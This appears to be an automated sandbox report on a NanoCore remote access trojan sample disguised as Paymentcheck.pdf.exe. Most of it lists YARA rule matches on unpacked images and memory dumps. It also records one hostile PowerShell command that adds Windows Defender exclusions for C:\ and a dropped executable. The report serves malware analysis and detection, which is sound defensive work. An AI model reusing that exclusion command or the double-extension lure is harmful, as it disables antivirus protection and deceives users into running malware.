Source: 13.2.RegAsm.exe.2808190.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.6960000.30.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.6960000.30.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.6920000.26.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.69f0000.37.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.6930000.27.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.6940000.28.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.5210000.21.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 0.2.Paymentcheck.pdf.exe.2f60b38.1.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 0.2.Paymentcheck.pdf.exe.2f60b38.1.unpack, type: UNPACKEDPE | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.3b13ba6.16.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.2878134.4.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.6980000.32.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.69be8a4.35.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.5214629.20.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.6980000.32.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.6940000.28.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.2857848.3.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.6030000.23.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.68e0000.25.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.68e0000.25.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.37c9930.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.3940179.13.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.6970000.31.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 13.2.RegAsm.exe.394c3ad.12.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.394c3ad.12.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.2863ac4.5.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.39609da.14.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 13.2.RegAsm.exe.3940179.13.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.939558053.0000000006030000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 0000000D.00000002.941661352.0000000006930000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000000.00000002.822099971.0000000002AF6000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000000.00000002.822099971.0000000002AF6000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.931452900.000000000284E000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.941806124.0000000006940000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 0000000D.00000002.941998389.0000000006970000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 0000000D.00000002.942163322.00000000069A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 0000000D.00000002.941330753.00000000068E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 0000000D.00000002.942180056.00000000069B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 0000000D.00000002.933970922.0000000003AAE000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.941937307.0000000006960000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 0000000D.00000002.942285370.00000000069F0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000000.00000002.824901195.0000000003A21000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000000.00000002.824901195.0000000003A21000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.941565178.0000000006920000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 0000000D.00000002.938347620.0000000004FF0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 0000000D.00000002.938540171.0000000005210000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 0000000D.00000002.926760586.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 0000000D.00000002.926760586.0000000000402000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.942057341.0000000006980000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000000.00000002.825194735.0000000003AA1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 00000000.00000002.825194735.0000000003AA1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: 0000000D.00000002.941830183.0000000006950000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: 0000000D.00000002.933547631.0000000003891000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: Paymentcheck.pdf.exe PID: 3736, type: MEMORYSTR | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: Process Memory Space: Paymentcheck.pdf.exe PID: 3736, type: MEMORYSTR | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Source: Process Memory Space: RegAsm.exe PID: 6732, type: MEMORYSTR | Matched rule: Detetcs the Nanocore RAT | Author: Florian Roth
Source: Process Memory Space: RegAsm.exe PID: 6732, type: MEMORYSTR | Matched rule: NanoCore | Author: Kevin Breen <kevin@techanarchy.net>
Executable has a suspicious name (potential lure to open the executable)
Source: Paymentcheck.pdf.exe | Static file information: Suspicious name
Initial sample is a PE file and has a suspicious name
Source: initial sample | Static PE information: Filename: Paymentcheck.pdf.exe
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Set-MpPreference -ExclusionPath C:\,'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\csrsss\msbuildd.exe'
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Code function: 0_2_04F41AB0
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Code function: 0_2_04F40040
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Code function: 0_2_04F40026
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Code function: 0_2_0793C3D8
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_004A3DFE
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_00ECE480
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_00ECE471
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_00ECBBD4
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_0619E690
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_06197230
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_06198078
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_0619FB88
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_0619F2A8
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_0619F366
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_06198136
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_06A2A490
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_06A22880
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 13_2_06A2B168
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_0795A788
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_07950368
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_07950E48
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_0795EC50
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_07959728
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_0795F6A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_07955248
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_0795B0C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_07951E88
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_07959EA0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_07957EA8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_07955D28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_079DE4E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_079D8710
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_079D0006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_079D8F40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_079D0E5B
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_079D1D88
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_079DADF8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_079D4D10
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_079D1D78
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_079DAB48
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_079D59F1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Code function: 14_2_079DC149
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Code function: 18_2_00993DFE
Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe | Code function: 22_2_00E63DFE
Source: Paymentcheck.pdf.exe | Binary or memory string: OriginalFilename vs Paymentcheck.pdf.exe
Source: Paymentcheck.pdf.exe, 00000000.00000002.847261038.0000000007460000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamemscorrc.dllT vs Paymentcheck.pdf.exe
Source: Paymentcheck.pdf.exe, 00000000.00000002.849443394.0000000007700000.00000004.00000001.sdmp | Binary or memory string: OriginalFilenameUyjtdycwlsevroaajvlbkd.dll" vs Paymentcheck.pdf.exe
Source: Paymentcheck.pdf.exe, 00000000.00000002.850489798.0000000007BA0000.00000002.00000001.sdmp | Binary or memory string: System.OriginalFileName vs Paymentcheck.pdf.exe
Source: Paymentcheck.pdf.exe, 00000000.00000002.851147674.0000000007C90000.00000002.00000001.sdmp | Binary or memory string: originalfilename vs Paymentcheck.pdf.exe
Source: Paymentcheck.pdf.exe, 00000000.00000002.851147674.0000000007C90000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs Paymentcheck.pdf.exe
Source: C:\Users\user\Desktop\Paymentcheck.pdf.exe | Section loaded: msvcp110_win.dll
Source: C:\Users\user\AppData\Local\Temp\RegAsm.exe | Section loaded: sfc.dll
Source: Paymentcheck.pdf.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED
Source: 13.2.RegAsm.exe.69a0000.33.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.69a0000.33.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.69b0000.36.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.69b0000.36.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.69a0000.33.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.69a0000.33.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6970000.31.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6970000.31.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Paymentcheck.pdf.exe.3aa1970.3.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.2863ac4.5.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.2863ac4.5.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.6030000.23.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6030000.23.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.3b0ad77.15.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.3b0ad77.15.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.3b0ad77.15.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.37c9930.8.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.37c9930.8.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.3b21fd6.17.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.3b21fd6.17.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.3814c35.11.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.3814c35.11.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Paymentcheck.pdf.exe.2f60b38.1.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 0.2.Paymentcheck.pdf.exe.2f60b38.1.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0.2.Paymentcheck.pdf.exe.2f60b38.1.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
Source: 13.2.RegAsm.exe.6950000.29.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.6950000.29.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.3b13ba6.16.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.3b13ba6.16.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.37d81d4.6.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.37d81d4.6.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.382dc19.10.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.382dc19.10.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 13.2.RegAsm.exe.69b0000.36.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
Source: 13.2.RegAsm.exe.69b0000.36.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
